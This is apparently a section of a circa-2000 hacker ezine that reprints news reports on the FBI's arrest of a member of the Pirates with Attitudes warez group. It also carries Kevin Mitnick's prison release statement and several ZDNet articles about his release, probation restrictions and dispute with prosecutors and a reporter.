Three days before Christmas, Rothberg somehow got a copy of Windows 2000--the latest update of the operating system, scheduled to go on sale next month--and uploaded it to the Internet, according to the criminal complaint.

Rothberg, an employee of NEC Technologies, accessed the group's Internet site through a Zenith Data Systems computer server in Buffalo Grove, the complaint states. At least two other users allegedly pirated and distributed software through servers in Chicago, at MegsInet Inc. on West Ohio and at Computer Engineers Inc. on North Wacker.

Members of the group downloaded software in exchange for uploading other programs, said Assistant U.S. Attorney Lisa Griffin. They might then give away or sell that software.

"It was a barter system, with the upshot being that the site itself contained an incredible amount of software," Griffin said.

FBI spokesman Ross Rice said the investigation is continuing. Authorities do not yet know the size of the pirating ring, or the monetary value of the thousands of stolen software titles allegedly distributed from the group's WAREZ site, called Sentinel.

WAREZ is a term for an Internet site that distributes pirated versions of software. The Sentinel site was launched in April 1996 and was set up so that only authorized users could access it; it was not available to the general public.

The group's members were "carefully screened to minimize the risk of detection" and were given specific roles, such as "crackers," who stripped away the copy protection often embedded in commercial software; "couriers," who transferred large volumes of software files from other pirating sites, and "suppliers," who brought in programs from major software companies.

Rothberg, according to the complaint, stole at least nine other major Microsoft programs between June and October 1999.

Microsoft did not respond Thursday to requests to comment on the case.

An industry group, the Business Software Alliance, has said software theft costs 33,000 jobs and $11 billion a year.

-=-

http://www.bostonherald.com/bostonherald/lonw/comp02042000.htm

FBI nabs Chelmsford man in software piracy ring

by Andrea Estes

Friday, February 4, 2000

Federal officials say they've captured a leader of a worldwide band of e-pirates who surf the cyberseas in search of software plunder.

Robin Rothberg, 32, of Chelmsford, is a founding member of Pirates with Attitudes, an international crew that steals popular titles from powerful companies and gives them away to its members for free, the FBI says.

The group, snared by FBI agents in Chicago, is sophisticated and devious enough to have sought after software before it hits the shelves, authorities said.
In December, FBI agents found Windows 2000 - which still hasn't been released - and Office 2000 premium, a program given to select customers for testing purposes. In all, agents found enough software to fill the memory of 1,200 average-sized personal computer hard drives.

Rothberg, who until last week was a notebook software engineer for NEC Computer Services in Acton, was arrested yesterday and charged with conspiracy in U.S. District Court in Boston. Wearing a long ponytail and black leather jacket, he pleaded not guilty and was released without bail.

According to an FBI affidavit, Pirates with Attitudes is a highly structured organization with different members assigned different tasks. ``Suppliers'' steal the programs from major software companies. ``Couriers'' deliver the files to PWA and ``crackers'' strip away the security codes that prevent piracy.

The group, overseen by a council, screens members to ``minimize the risk of detection by authorities,'' according to an affidavit filed by FBI Special Agent Michael Snyder of Chicago.

Rothberg, who is alleged to be a member of the council, was arrested after an informant helped steer Snyder, an MBA and computer expert, through its maze-like system.

Agents located PWA's internet site, ``Sentinel,'' which is accessible only to authorized users.

``Members maintain access to PWA's site by providing files, including copyrighted software files obtained from other sources, and in turn are permitted to copy files provided by other users,'' wrote Snyder.

``Using the confidential informant's access codes, FBI agents logged onto Sentinel and viewed a directory listing thousands of copyrighted software titles available for downloading by PWA members,'' he wrote.

So far only Rothberg has been arrested. Chicago authorities yesterday said the investigation is continuing.
``In the simplest terms, it's an organization that allowed its members to upload software to a site configured so it could store a substantial amount of software,'' said assistant United States Attorney Lisa Griffin. ``They could then download it into their own computers.''

Members give and take what they wish, officials said. ``It's a two-way street,'' said Randy Sanborn, spokesman for the United States Attorney's Office in the Northern District of Illinois.

Officials wouldn't say whether members have to pay anything - such as a membership fee - for the service.

Rothberg was downsized out of his job last week when the division he worked for ceased to exist, according to an NEC spokeswoman, who said the company has no plans to investigate Rothberg's job performance.

Rothberg asked Magistrate Judge Robert Collings for permission to travel to California today for a job interview. And Rothberg said he had several more planned, his attorney Joseph Savage told Collings.

Collings ordered him to stay off his computer except to look for a job, let the FBI spot check his e-mail, and get the court's permission if he wants to travel outside the Bay State.

@HWA

24.0 Mitnick's Release Statement
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I debated whether or not to include this in this issue since the news is saturated with Mitnick stories right now (at least they're taking notice) and decided it was valid to include it here in our archives. There are many more articles available on Mitnick, so I've just included his release statement. Check out the sites http://www.freekevin.com/ or http://www.2600.com/ for more info.

Mitnick's Release Statement:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

January 21, 2000

Kevin Mitnick read the statement shown below upon his release from federal custody in Lompoc, California after nearly 5 years behind bars. Mr. Mitnick is the copyright holder of this statement, and hereby gives permission for limited reuse and republication under the Fair Use doctrine of U.S. Copyright Law.
All other rights reserved.

Good morning. Thank you all for taking the time to come out to Lompoc today, my first day of freedom in nearly five years. I have a brief statement to read, and I ask that you permit me to read my statement without interruption.

First, I'd like to thank the millions of people who have visited the website kevinmitnick.com during my incarceration, and who took the time to show their support for me during the past five years. I relied on their support during the five years I've been incarcerated more than they will ever realize, and I want to thank them all from the bottom of my heart.

As many of you know, I've maintained virtually complete silence during my incarceration -- I've refused dozens of requests for interviews from news organizations from around the world, and for very real reasons -- my actions and my life have been manipulated and grossly misrepresented by the media since I was 17, when the Los Angeles Times first violated the custom, if not the law, that prohibits publication of the names of juveniles accused of crimes.

The issues involved in my case are far from over, and will continue to affect everyone in this society as the power of the media to define the "villain of the month" continues to increase.

You see, my case is about the power of the media to define the playing field, as well as the tilt of that playing field -- it's about the power of the media to define the boundaries of "acceptable discussion" on any particular issue or story.

My case is about the extraordinary breach of journalistic ethics as demonstrated by one man, John Markoff, who is a reporter for one of the most powerful media organizations in the world, the New York Times.

My case is about the extraordinary actions of Assistant U.S. Attorneys David Schindler and Christopher Painter to obstruct my ability to defend myself at every turn.
And, most importantly, my case is about the extraordinary favoritism and deference shown by the federal courts toward federal prosecutors who were determined to win at any cost, and who went as far as holding me in solitary confinement to coerce me into waiving my fundamental Constitutional rights. If we can't depend on the courts to hold prosecutors in check, then whom can we depend on?

I've never met Mr. Markoff, and yet Mr. Markoff has literally become a millionaire by virtue of his libelous and defamatory reporting -- and I use the word "reporting" in quotes -- Mr. Markoff has become a millionaire by virtue of his libelous and defamatory reporting about me in the New York Times and in his 1991 book "Cyberpunk."

On July 4th, 1994, an article written by Mr. Markoff was published on the front page of the New York Times, above the fold. Included in that article were as many as 60 -- sixty! -- unsourced allegations about me that were stated as fact, and that even a minimal process of fact-checking would have revealed as being untrue or unproven.

In that single libelous and defamatory article, Mr. Markoff labeled me, without justification, reason, or supporting evidence, as "cyberspace's most wanted," and as "one of the nation's most wanted computer criminals."

In that defamatory article, Mr. Markoff falsely claimed that I had wiretapped the FBI -- I hadn't -- that I had broken into the computers at NORAD -- which aren't even connected to any network on the outside -- and that I was a computer "vandal," despite the fact that I never damaged any computer I've ever accessed.

Mr. Markoff even claimed that I was the "inspiration" for the movie "War Games," when a simple call to the screenwriter of that movie would have revealed that he had never heard of me when he wrote his script.

In yet another breach of journalistic ethics, Mr. Markoff failed to disclose in that article -- and in all of his following articles about me -- that we had a pre-existing relationship, by virtue of Mr. Markoff's authorship of the book "Cyberpunk."

Mr. Markoff also failed to disclose in any of his articles about this case his pre-existing relationship with Tsutomu Shimomura, by virtue of his personal friendship with Mr. Shimomura for years prior to the July 4, 1994 article Mr. Markoff wrote about me.

Last but certainly not least, Mr. Markoff and Mr. Shimomura both participated as de facto government agents in my arrest, in violation of both federal law and journalistic ethics. They were both present when three blank warrants were used in an illegal search of my residence and my arrest, and yet neither of them spoke out against the illegal search and illegal arrest.

Despite Mr. Markoff's outrageous and libelous descriptions of me, my crimes were simple crimes of trespass. I've acknowledged since my arrest in February 1995 that the actions I took were illegal, and that I committed invasions of privacy -- I even offered to plead guilty to my crimes soon after my arrest. But to suggest without reason or proof, as did Mr. Markoff and the prosecutors in this case, that I had committed any type of fraud whatsoever, is simply untrue, and unsupported by the evidence.

My case is a case of curiosity -- I wanted to know as much as I could find out about how phone networks worked, and the "ins" and "outs" of computer security. There is NO evidence in this case whatsoever, and certainly no intent on my part at any time, to defraud anyone of anything.

Despite the absence of any intent or evidence of any scheme to defraud, prosecutors Schindler and Painter refused to seek a reasonable plea agreement -- indeed, their first "offer" to me included the requirement that I stipulate to a fraud of $80 million dollars, and that I agree never to disclose or reveal the names of the companies involved in the case.
Have you ever heard of a fraud case where the prosecutors attempted to cover up the existence of the fraud? I haven't. But that was their method throughout this case -- to manipulate the amount of the loss in this case, to exaggerate the alleged harm, to cover up information about the companies involved, and to solicit the companies involved in this case to provide falsified "damages" consistent with the false reputation created by Mr. Markoff's libelous and defamatory articles about me in the New York Times.

Prosecutors David Schindler and Christopher Painter manipulated every aspect of this case, from my personal reputation to the ability of my defense attorney to file motions on time, and even to the extent of filing a 1700 item exhibit list immediately before trial. It was the prosecutors' intent in this case to obstruct justice at every turn, to use the unlimited resources of the government and the media to crush a defendant who literally had no assets with which to mount a defense.

The fact of the matter is that I never deprived the companies involved in this case of anything. I never committed fraud against these companies. And there is not a single piece of evidence suggesting that I did so. If there was any evidence of fraud, do you really think the prosecutors in this case would have offered me a plea bargain? Of course not.

But prosecutors Schindler and Painter would never have been able to violate my Constitutional rights without the cooperation of the United States federal court system. As far as we know, I am the only defendant in United States' history to ever be denied a bail hearing. Recently, Mr. Painter claimed that such a hearing would have been "moot," because, in his opinion, the judge in this case would not have granted bail. Does that mean that the judge in this case was biased against me, and had her mind made up before hearing relevant testimony? Or does that mean that Mr. Painter believes it is his right to determine which Constitutional rights defendants will be permitted to have, and which rights they will be denied?

The judge in this case consistently refused to hold the prosecutors to any sort of prosecutorial standard whatsoever, and routinely refused to order the prosecutors to provide copies of the evidence against me for nearly four years. For those of you who are new to this case, I was held in pre-trial detention, without a bail hearing and without bail, for four years. During those four years, I was never permitted to see the evidence against me, because the prosecutors obstructed our efforts to obtain discovery, and the judge in this case refused to order them to produce the evidence against me for that entire time. I was repeatedly coerced into waiving my right to a speedy trial because my attorney could not prepare for trial without being able to review the evidence against me.

Please forgive me for taking up so much of your time. The issues in this case are far more important than me, they are far more important than an unethical reporter for the New York Times, they're far more important than the unethical prosecutors in this case, and they are more important than the judge who refused to guarantee my Constitutional rights. The issues in this case concern our Constitutional rights, the right of each and every one of us to be protected from an assault by the media, and to be protected from prosecutors who believe in winning at any cost, including the cost of violating a defendant's fundamental Constitutional rights. What was done to me can be done to each and every one of you.

In closing, let me remind you that the United States imprisons more people than any other country on earth.

Again, thank you for taking time out of your busy lives to come to Lompoc this morning, and thank you all for your interest and your support.
@HWA

24.1 More submitted Mitnick articles
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributions by Zym0t1c

Hacker Mitnick released Friday

For the first time since 1995, computer criminal Kevin Mitnick is a free man. But will he hack again?

Nearly five years after news of his arrest blazed across the nation's headlines, hacker Kevin Mitnick walked out of a medium security prison in Lompoc, Calif., early Friday morning -- and into an uncertain future.

Read the article online at:
http://www.zdnet.com/zdnn/stories/news/0,4586,2425165,00.html

Read the (fine but short) Dutch article at:
http://www.zdnet-be.com/zdbe.asp?ch=NI&artid=4462

Since this is *big* news, you can stay here and read the ASCII-version:

Hacker Mitnick released Friday
By Kevin Poulsen, ZDNet News
UPDATED January 21, 2000 9:30 AM PT

For the first time since 1995, computer criminal Kevin Mitnick is a free man. But will he hack again?

Nearly five years after news of his arrest blazed across the nation's headlines, hacker Kevin Mitnick walked out of a medium security prison in Lompoc, Calif., early Friday morning -- and into an uncertain future.

The 36-year-old hacker was greeted at the gate by friends and family members. His mother will drive him to Los Angeles, where his first order of business will be to obtain a driver's license, report to his new probation officer and see a doctor about injuries he suffered in a prison bus accident last year.

"He's having neck pains, and back and shoulder pains," said Reba Vartanian, Mitnick's grandmother. "He hasn't had a regular doctor in five years."
A free man for the first time since 1995, he will live in the Los Angeles suburb of Westlake Village with his father, Alan Mitnick, a general contractor.

Less clear is what Mitnick is going to do for a living. Under court order, the hacker is banned for three years from using any kind of computer equipment without the prior written permission of his probation officer -- a restriction that even the court acknowledged would affect his employability.

"He's experiencing a lot of frustration over the things he can't do," said Eric Corley, editor of the hacker magazine 2600 and the leader of a "Free Kevin" grass-roots movement. "Keep in mind this is someone who's been kept away from these things for five years, and when he gets out he won't even be able to touch them."

Does incarceration cure an addict?

The restrictions, and long history of recidivism, make one former friend and partner-in-crime pessimistic about Mitnick's future.

"Do you cure a drug addict or alcoholic by incarceration on its own?" asked Lew DePayne, rhetorically. "Do you cure him by taking away his ability to earn a living?"

Mitnick and DePayne became friends in the late 1970s, when they were both teenagers. Together, they explored and manipulated the telephone network as Los Angeles' most notorious "phone phreaks." In the 1980s, DePayne seemingly dropped out of the scene, while Mitnick moved on to corporate computers and networks, developing a penchant for cracking systems in search of proprietary "source code," the virtual blueprints for a computer program or operating system.

Mitnick had already been in a series of minor skirmishes with the law when, in 1989, he suffered his first adult felony conviction for cracking computers at Digital Equipment Corp. and downloading source code. He served one year in federal custody, followed by three years of supervised release. In 1992, Mitnick was charged with a violation of his supervision for associating with DePayne again.
He went underground and online, using the Internet to crack computers belonging to such cell phone and computer makers as Motorola (NYSE: MOT), Fujitsu and Sun Microsystems (Nasdaq: SUNW) and to copy more proprietary source code.

The FBI captured him on Feb. 15, 1995, when computer security expert Tsutomu Shimomura suffered an attack on his machine and responded by tracking Mitnick to his hideout in Raleigh, N.C. Shimomura and New York Times reporter John Markoff went on to write the book "Takedown: The Pursuit and Capture of America's Most Wanted Computer Outlaw -- By The Man Who Did It."

Shimomura and Markoff sold the movie rights to Miramax Films, who cast Skeet Ulrich as Mitnick. But since shooting wrapped on the project in December 1998 the movie has languished on the shelf with no known theatrical release date, surrounded by swirling rumors of a direct-to-video or cable TV release. Miramax publicists didn't return telephone inquiries about the project.

Mitnick's arrest began a series of courtroom battles over procedures and evidence that finally ended last year in a plea agreement. The hacker pleaded guilty in March 1999 to seven felonies and admitted to his Internet hacking. In August 1999, Judge Marianna Pfaelzer sentenced him to 46 months in prison, on top of an earlier 22 months sentence for the supervision violation and cell phone cloning. With credit for his lengthy period of pretrial custody, and some time off for good behavior, Mitnick's served just under five years in prison.

"My sincere hope is that he gets his act together and complies with the conditions of his supervised release and doesn't engage in further hacking activity," said Assistant U.S. Attorney Christopher Painter, one of Mitnick's two federal prosecutors. Painter's work on the Mitnick case helped propel him to a position as deputy chief of the U.S. Department of Justice's computer crime and intellectual property section in Washington, D.C. He begins at the DOJ in March.

"I think that the significance of this case is that he was so prolific. He not only had done this once before, but he did it on such a large scale," Painter said. "If past ends up being prologue, then certainly we'll go back to court and deal with it at that time."

From hacking to ham?

Greg Vinson, one of Mitnick's defense attorneys, foresees a rosier future for the hacker, perhaps with a job that exploits his famous ability to "social engineer" people into doing his bidding.

"I think he's had a number of different offers to kind of do PR-type of work," said Vinson, who also points out that Mitnick might still get a computer job. "You have to remember the order says, 'Without the prior express permission of the probation office.' So it's not absolutely prohibited."

If Mitnick can't use computers, he reportedly hopes to indulge his love for technology by returning to amateur radio, a childhood passion. Federal Communications Commission records show that Mitnick's license expired last month. According to Kimberly Tracey, a ham radio operator in Los Angeles and a friend of Mitnick's, he's been scrambling to renew it.

"This is going to be part of Kevin's life, because they've taken away computers and everything else," said Tracey. "I hope they don't take away this."

Mitnick was unavailable for comment on his imminent release. Sources close to the hacker say he granted the CBS news show "60 Minutes" an exclusive interview last week, which is scheduled to air Sunday. But in an interview with ZDNet News last July, Mitnick complained about his treatment by the government prosecutors, who he said were "grossly exaggerating the losses in the case and the damages I caused." (See: Mitnick says, "I was never a malicious person.")

DePayne: Anger a major stumbling block

DePayne, Mitnick's former friend and co-defendant, worries that Mitnick's anger will work against him in his new life.

"I don't know if that's ever going to go away; I don't know if he'll be able to deal with it," said DePayne, speaking from his home in Palo Alto, Calif., where he's serving six months house arrest for aiding Mitnick's hacking during his fugitive years. "That's going to be a major stumbling block for him going forward."

DePayne said he last heard from Mitnick the night of his arrest, on a message left on his answering machine. Now 39 years old, divorced and heading a small Internet company of his own, DePayne insists he doesn't plan on associating with the impish hacker he first met as a brash teenager two decades ago.

"I can't be fooling around with these stunts and practical jokes that Kevin might want to fool around with," said DePayne. "I'll miss Kevin. I won't miss the trouble he brings to the table."

Kevin Poulsen is a former hacker. He writes a weekly column for ZDTV's CyberCrime.

____________________________________________________________________________

Mitnick: I was manipulated

That's how hacker Kevin Mitnick feels after almost five years behind bars.

Just freed from prison Friday, notorious hacker Kevin Mitnick slammed prosecutors and a New York Times' reporter for allegedly treating him unjustly in the court and in the media over the past six years.

Read the article online at:
http://www.zdnet.com/zdnn/stories/news/0,4586,2425686,00.html?chkpt=zdnntop

Since this is *big* news, you can stay here and read the ASCII-version:

Mitnick: I was manipulated
By Robert Lemos, ZDNet News
UPDATED January 21, 2000 3:41 PM PT

Just freed from prison Friday, notorious hacker Kevin Mitnick slammed prosecutors and a New York Times' reporter for allegedly treating him unjustly in the court and in the media over the past six years.

"Prosecutors ... manipulated every aspect of this case from my personal reputation, to the ability of my defense attorney to file motions in time, and even to the extent of filing a 1,700-item exhibit list immediately before a trial," said Mitnick, reading from a three-page statement to reporters gathered near the Lompoc, Calif. prison facility, minutes after being released from the medium-security prison.

Almost five years ago, federal authorities arrested Mitnick on a 25-count indictment relating to misuse of Pacific Bell equipment for illegal wiretaps and copying proprietary source code from Motorola, Sun Microsystems Inc., NEC Corp. and Novell, among others.

"My case is one of curiosity," said Mitnick. "There was no intent to defraud anyone of anything."

New York Times' reporter John Markoff covered the latter portion of the two-and-a-half year pursuit of Mitnick, and in a July 4, 1994, article called him "Cyberspace's most wanted." Mitnick blames the hype surrounding his elusive flight from authorities and his subsequent arrest on Markoff's article. In addition, the 36-year old ex-hacker claims that Markoff crossed the line by bringing authorities and computer expert Tsutomu Shimomura together to track him down. Mitnick went as far as to call the article libelous and defamatory.

In a Friday morning interview, Markoff stood by his reporting, saying that the allegations were "really disappointing to me because it suggests that in the past five years, and perhaps in the last 20 years, Kevin has not learned anything. What he might have learned from all his time in prison is that it is wrong to break into other people's computers. I don't think it is anymore complex than that."

Markoff pointed out that Mitnick had been arrested five times in the last 20 years for computer-related crimes. "The problem is, and the reason the judge kept him away from computers, (is that) this is the fifth time that he has been arrested. It's not like they haven't given him chances," said Markoff.
Markoff also denied any ethical breach. "I won't get into the specifics on those three cases," Markoff said. "I want to say that I stand by my story, and to note that it was written while Kevin was a fugitive from four law enforcement agencies, and that's why it was written."

In court, Mitnick also claims he didn't get a fair shake. Looking tired and much thinner than five years ago, the bespectacled cybercriminal blamed prosecution for blocking his defense from acting on his behalf.

"Their method (in) this case was to manipulate the amount of loss to exaggerate the alleged harm," he said. "I've acknowledged since my arrest in February, 1995, that the actions I took were illegal, and that I committed invasions of privacy. But to suggest without reason or proof, as did Mr. Markoff and the prosecutors in this case, that I had committed any type of fraud whatsoever, is simply untrue, and unsupported by the evidence."

Damages 'grossly inflated'

In total, the prosecution estimated damages at $80 million by including the full R&D costs of the applications and source code that Mitnick copied, even though none of the code was ever sold to another company or is known to have been used by a competitor.

"Everybody realizes that those (estimates) were greatly inflated," said Jennifer Granick, a San Francisco defense attorney, who represented hacker Kevin Poulsen in litigation following that hacker's release from prison. (Poulsen is a ZDNet News contributor.)

The number may sound familiar. That's because David L. Smith, who plead guilty to writing and releasing the Melissa virus in December, similarly admitted to the prosecutor's assessed damages of $80 million. It's no coincidence: Under federal law that is the maximum amount accounted for by sentencing guidelines. In fact, it is usually the major factor in determining the length of jail time.

That leads to a skewed pursuit of justice, said Granick. "The criminal courts are here to deal with societal wrongs," she said. "It is not their primary purpose to recompense the victims."

"I hope that the Kevin Mitnick case is the last case of the great '80s hacker hysteria," she continued. "I hope that we won't have the same kind of hype in the future so that people can get a fair shake in the media and in court."

The U.S. Attorney's office could not comment by press time.

Kevin Poulsen contributed to this report.

____________________________________________________________________________

The case of the kung fu 'phreak'

Did Kevin Mitnick really trash-talk his hunter, Tsutomu Shimomura, about his kung fu ability? The real kung fu prankster is unmasked.

Read the article online at:
http://www.zdnet.com/zdnn/stories/news/0,4586,2425425,00.html

Since this is *big* news, you can stay here and read the ASCII-version:

The case of the kung fu 'phreak'

Did Kevin Mitnick really trash-talk his hunter, Tsutomu Shimomura, about his kung fu ability? The real kung fu prankster is unmasked.

By Kevin Poulsen, ZDNet News
January 21, 2000 11:59 AM PT

Two days after computer security expert Tsutomu Shimomura suffered the now-legendary Christmas Day 1994 hack-attack that launched his search for Kevin Mitnick, a mysterious message left on his voice mail box added real-world menace to the cyberspace crime.

"Damn you, my technique is the best," said an odd voice in a faux-British accent. "I know sendmail technique, and my style is much better ... Me and my friends, we'll kill you."

Three days later the caller left another message, this time beginning with a kung fu scream and affecting the voice of an actor in a martial arts film: "Your security technique will be defeated. Your technique is no good."

In a third message, on Feb. 4, 1995, the caller chided Shimomura, who he called "grasshopper," for mentioning the messages in a Newsweek article on the intrusion and for putting digitized copies on the Internet. "Don't you know that my kung fu is the best?"
The taunting phone calls were presumed to be from Shimomura's intruder, and they became a fixture in the Shimomura vs. Mitnick manhunt story. Digitized copies can be found on the official Web site for Shimomura's book, "Takedown: The Pursuit and Capture of America's Most Wanted Computer Outlaw -- By The Man Who Did It." The equation of hacking with kung fu fighting has become a cultural touchstone in its own right, and on more than one occasion the "Lone Gunmen" hackers on Fox's "The X-Files" have been heard to mutter, "My kung fu is the best." The real kung fu 'phreak' The only problem is, the thinly disguised voice never sounded at all like Kevin Mitnick, and two of the messages came after the hacker had been arrested. "I heard that this guy named Shimomura had been hacked ... So I just thought, What the hell, I'd leave some voice mails," says 31-year-old Zeke Shif. "I used to watch kung fu movies a lot." Under the handle "SN," Shif once had a solid reputation in the computer underground as a "phone phreak" (i.e., phone hacker). But he says that, by 1995, his fear of "The Man" had long since scared him straight; he simply succumbed to the temptation to make some prank phone calls. "I thought I'd be funny," says Shif, who like many hackers from the early 1990s has gone on to work in the computer security trade, for Virginia-based Network Security Technologies Inc. The matter became less amusing when Shif read the news reports on Feb. 15, 1995. "I found out Mitnick got caught, and they were trying to link that to the voice mail," says Shif, who responded by calling Shimomura again. "I left a pre-emptive messages, saying, listen, this has nothing to do with any Mitnick or anything, I'm just making fun of kung fu movies." And this time, he didn't call him grasshopper. 
____________________________________________________________________________

Mitnick Released

Hacker Kevin Mitnick, released after nearly five years in prison, blames the media and federal prosecutors for his imprisonment.

Read the article online at:
http://www.zdnet.com/zdtv/cybercrime/news/story/0,3700,2118614,00.html

Since this is *big* news, you can stay here and read the ASCII-version:

Mitnick Released

Hacker Kevin Mitnick, released after nearly five years in prison, blames the media and federal prosecutors for his imprisonment.

By Iolande Bloxsom
January 21, 2000

Convicted hacker Kevin Mitnick was released early this morning from federal prison in Lompoc, California. Possibly the most famous hacker ever, Mitnick was arrested in February of 1995, and has spent almost five years in prison.

In a prepared statement, Mitnick had harsh words for both the media and federal prosecutors, both of whom he blamed for his long incarceration. The media "grossly misreported" his case and created what he called the "villain of the month." He also railed against the media for "defin[ing] what is 'acceptable discussion'."

Mitnick singled out John Markoff, a reporter for The New York Times, accusing him of "libelous and defamatory reporting-- and I use the word reporting in quotes." He charged that Markoff's articles had facts that were untrue, that were unproven, and that Markoff failed to disclose a previous relationship. (Mitnick appeared in Cyberpunk, a book Markoff co-wrote with Katie Hafner in 1995.) Finally, Mitnick claimed that the journalist "is a millionaire" now because of his reporting on the convicted hacker.

In a later interview with ZDTV's Janet Yee, Markoff said he stood by his reporting.

However, Mitnick had equal censure for prosecutors David Schindler and Christopher Painter, who, he claimed "went as far as holding me in solitary confinement," to try to force him to plead guilty. He says, though, that his crime was one of trespass, rather than fraud. "I never deprived companies of anything... there was never any evidence of fraud."

Mitnick pleaded guilty on March 26, 1999, to seven felonies, including unauthorized intrusion into computers at cellular telephone companies, software manufacturers, ISPs, and universities. He also admitted to illegally downloading proprietary software from some of these companies.

In August, US District Court Judge Marianna Pfaelzer sentenced Mitnick to 46 months in prison and ordered him to pay $4,125 in restitution. She also ordered Mitnick not to touch a computer or cellular phone without written approval from his probation officer.

The sentence, governed by a plea agreement between Mitnick and his prosecutors, ran on top of the 22 months he already received for cell-phone cloning and a probation violation, for a total of 68 months. With credit for his lengthy pretrial custody and some time off for good behavior, Mitnick served just less than five years in prison.

Mitnick is headed back to Los Angeles, where his family lives.

By Iolande Bloxsom
January 21, 2000

____________________________________________________________________________

Mitnick's Digital Divide

/* This is news from two weeks ago, but still a headline */

It's the year 2000, and Kevin Mitnick is going free. The problem is, he'll be trapped in 1991.

Read the online article at:
http://www.zdnet.com/zdtv/cybercrime/chaostheory/story/0,3700,2128328,00.html

Since this is *big* news, you can stay here and read the ASCII-version:

Mitnick's Digital Divide

It's the year 2000, and Kevin Mitnick is going free. The problem is, he'll be trapped in 1991.

By Kevin Poulsen
January 12, 2000

On Friday, January 21, hacker Kevin Mitnick will go free after nearly five years behind bars. But when he walks out the gates of the Lompoc federal correctional institution in California, he'll be burdened with a crippling handicap: a court order barring him for up to three years from possessing or using computers, "computer-related" equipment, software, and anything that could conceivably give him access to the Internet.

These anti-computer restrictions are even more ridiculous today than when I faced them upon leaving federal custody in June, 1996. In the wired world of 2000, you'd be hard pressed to find a job flipping burgers that didn't require access to a computerized cash register, and three years from now McDonald's applicants will be expected to know a little Java and a smattering of C++.

Since Mitnick's arrest in 1995, the Internet has grown from a hopeful ditty to a deafening orchestral roar rattling the windows of society. The importance of computer access in America has been acknowledged by the White House in separate initiatives to protect technological infrastructure from "cyberterrorists," and to bridge the so-called digital divide between information haves and have-nots.

"We must connect all of our citizens to the Internet," vowed President Clinton last month. He was not referring to Kevin Mitnick.

Mitnick, dubbed the "World's Most Notorious Hacker" by Guinness, pleaded guilty on March 26 to seven felonies, and admitted to cracking computers at cellular telephone companies, software manufacturers, ISPs, and universities, as well as illegally downloading proprietary software. Though he's never been accused of trying to make money from his crimes, he's been in and out of trouble for his nonprofit work since he was a teenager.

So, the theory goes, keeping Mitnick away from computers will deprive a known recidivist of the instruments of crime and set him on the road to leading a good and law-abiding life.

I've heard that theory from prosecutors, judges and my (then) probation officer. They all compare computers to lock picks, narcotics, and guns-- everything but a ubiquitous tool used by a quarter of all Americans and nearly every industry.

Mitnick, we should believe, will be tempted in the next year or so to crack some more computers and download some more software. But when the crucial moment comes for him to commit a felony that could land him in prison for a decade, his fingers will linger indecisively over the keyboard as he realizes, "Wait! I can't use a computer! My probation officer will be pissed!"

The fact is, if Mitnick chooses crime, he won't be deterred by the 11 months in prison that a technical supervised release violation could carry. These conditions only prevent him from making legitimate use of computers.

Mitnick's rehabilitation is up to him. But the system shouldn't throw up obstructions by keeping him away from the mainstream, on the sidelines, and out of the job market. His probation officer will have the power to ease his restrictions, perhaps by allowing him to get a computer job with the informed consent of his employer. That would be a good start.

January 21 will be a happy day for Mitnick, his family, and friends. But getting out of prison after a long stretch carries challenges too. Nobody is served by stranding the hacker on the wrong side of the digital divide.

____________________________________________________________________________

Mitnick: 'I was never a malicious person'

/* This is news from a few months ago, but still a headline */

Hacker files motion accusing government of misconduct -- goes on the record with ZDNN. 'The federal government manipulated the facts.'

Read the online article at:
http://www.zdnet.com/zdnn/stories/news/0,4586,2306704,00.html?chkpt=zdnnrla

Since this is *big* news, you can stay here and read the ASCII-version:

Mitnick: 'I was never a malicious person'

Hacker files motion accusing government of misconduct -- goes on the record with ZDNN.
'The federal government manipulated the facts.'

By Kevin Poulsen, ZDNet News
July 30, 1999 4:36 PM PT

Kevin Mitnick and his attorneys are asking a federal judge to unseal a court filing that they claim proves the government was guilty of misconduct while building its case against the hacker. The goal, says Mitnick in a rare interview, is to clear his name.

"At the beginning of this case the federal government manipulated the facts to allege losses that were grossly inflated," Mitnick said in a telephone interview Thursday night from the Los Angeles Metropolitan Detention Center. "Hopefully, if the court considers this motion and rules upon its merits, it will clear me publicly of the allegations that I caused these significant losses."

The motion, filed by defense attorney Don Randolph on July 22, is the latest conflict in a case that's remained unusually acrimonious, considering that both sides reached a plea settlement in March.

Under the terms of the agreement, Mitnick pleaded guilty to seven felonies and admitted to penetrating computers at such companies as Motorola (NYSE:MOT), Fujitsu and Sun Microsystems, (Nasdaq:SUNW) and downloading proprietary source code.

On Aug. 9, he's expected to be sentenced to 46 months in prison, on top of the 22 months he received for cell phone cloning and an earlier supervised release violation.

Mitnick vexed by 'snowball effect'

The only sentencing issue left unresolved is the amount of money Mitnick will owe his victims. Prosecutors are seeking $1.5 million in restitution -- a modest figure compared to the more than $80 million the government quoted to an appeals court last year, when it successfully fought to hold the hacker without bail.

That figure, though no longer promulgated by prosecutors, vexes Mitnick, who sees a "snowball effect" of bad press that began with a 1994 front-page article in the New York Times.

"Because of this assault that was made upon me by John Markoff of the New York Times, then the federal government grossly exaggerating the losses in the case and the damages I caused, I have a desire to clear my name," Mitnick said. "The truth of the matter is that I was never a malicious person. I admit I was mischievous, but not malicious in any sense."

Markoff reported on Mitnick for the New York Times, and went on to co-author Tsutomu Shimomura's book, "Takedown: The Pursuit and Capture of America's Most Wanted Computer Outlaw -- By The Man Who Did It," slated as an upcoming movie from Miramax. Markoff's portrayal of Mitnick, and the profit it ultimately earned him, has been the subject of some criticism from Mitnick's supporters, and raised eyebrows with a handful of journalists.

Markoff's most enduring Mitnick anecdote is the story that the hacker cracked NORAD in the early 1980s, a claim that was recycled as recently as last May by another New York Times reporter.

"I never even attempted to access their computer, let alone break into it," Mitnick said. "Nor did I do a host of allegations that he says I'm guilty of."

For his part, Markoff says of the NORAD story: "I had a source who was a friend of Kevin's who told me that. I was not the first person to report it, nor the only person to report it."

Government collusion?

The July 22 motion filed by Mitnick's attorney accuses the government of coaching victim companies on how to artificially inflate their losses.

The filing is based on documents Randolph subpoenaed from Sun, which show that shortly after Mitnick's February 1995 arrest, the FBI specifically instructed Sun to calculate its losses as "the value of the source code" Mitnick downloaded, and to keep the figure "realistic."

